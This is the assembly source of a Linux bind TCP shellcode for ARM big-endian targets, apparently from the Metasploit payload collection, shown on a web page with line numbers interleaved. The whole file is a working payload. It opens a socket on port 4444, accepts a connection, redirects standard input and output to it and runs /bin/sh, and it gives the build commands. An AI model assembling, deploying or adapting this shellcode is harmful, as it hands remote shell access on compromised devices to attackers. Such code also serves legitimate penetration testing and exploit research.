Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
@@
2
@
3
@        Name: single_sock_bind
4
@   Qualities: -
5
@     Authors: Balazs Bucsay <@xoreipeip>
6
@     License: MSF_LICENSE
7
@ Description:
8
@
9
@        Implementation of a Linux bind TCP shellcode for ARM BE architecture.
10
@
11
@        Assemble with: 
12
@          armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o
13
@        Link with:
14
@          armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode
15
@
16
@ Meta-Information:
17
@
18
@ meta-shortname=Linux Bind TCP
19
@ meta-description=Listen on a port for a connection and run a second stage
20
@ meta-authors=earthquake
21
@ meta-os=linux
22
@ meta-arch=armbe
23
@ meta-category=singles
24
@ meta-connection-type=bind
25
@ meta-name=bind_tcp
26
@@
27

28

29
.section .text
30
	.global _start
31

32
	_start:
33
		.code 32
34

35
@		 Thumb-Mode on
36
		add 	r6, pc, #1
37
		bx	r6
38
		.code 	16
39

40
@		 _socket(2,1,0)
41
		sub	r2, r2, r2
42
		add	r1, r2, #1
43
		add	r0, r2, #2
44
		lsl	r7, r1, #8
45
		add	r7, r7, #0x19
46
		svc	1
47
		mov	r6, r0
48

49
@	1  uint8_t 	sin_len
50
@	1 sa_family_t 	sin_family
51
@	2 in_port_t 	sin_port
52
@	4 struct in_addr 	sin_addr
53
@	8 char 	sin_zero [8]
54
@	00 02 5C11 00000000 00000000 00000000
55
@	5c11 => 4444
56
@		 _bind()
57
		mov	r2, #2
58
		lsl	r2, r2, #8
59
		add	r2, r2, #0x11
60
		lsl	r2, r2, #8
61
		add	r2, r2, #0x5C
62
		sub	r3, r3, r3
63
		sub	r4, r4, r4
64
		sub 	r5, r5, r5
65
		mov	r1, sp
66
		stm	r1!, {r2-r5}
67
		sub	r1, #0x10
68
		mov	r2, #16
69
		add	r7, r7, #1
70
		svc	1
71

72
@		 _listen()
73
		mov	r0, r6
74
		sub	r1, r1, r1
75
		add	r7, r7, #2
76
		svc	1
77
		
78
@		 _accept()
79
		mov	r0, r6
80
		sub	r2, r2, r2
81
		add	r7, r7, #1
82
		svc	1
83
		mov	r6, r0
84

85
@		 _dup2()
86
		sub	r1, r1, r1
87
		mov	r7, #63
88
		svc	1
89
	
90
		mov	r0, r6
91
		add	r1, r1, #1
92
		svc	1
93

94
		mov	r0, r6
95
		add	r1, r1, #1
96
		svc	1
97

98
		 _execve()
99
		sub	r2, r2, r2
100
		mov 	r0, pc
101
		add 	r0, #18
102
@ next intstruction terminates the string beneath the code "//bin/sh"
103
@ in case you want to say goodbye to the null character
104
@		str	r2, [r0, #8]
105
		str	r2, [sp, #8]
106
		str	r0, [sp, #4]
107
		add 	r1, sp, #4
108
		mov 	r7, #11
109
		svc 	1
110

111
@		 _exit()
112
		sub	r4, r4, r4
113
		mov	r0, r4
114
		mov 	r7, #1
115
		svc	1
116
.ascii "//bin/sh\0"
117
@.ascii "//bin/sh"
118

119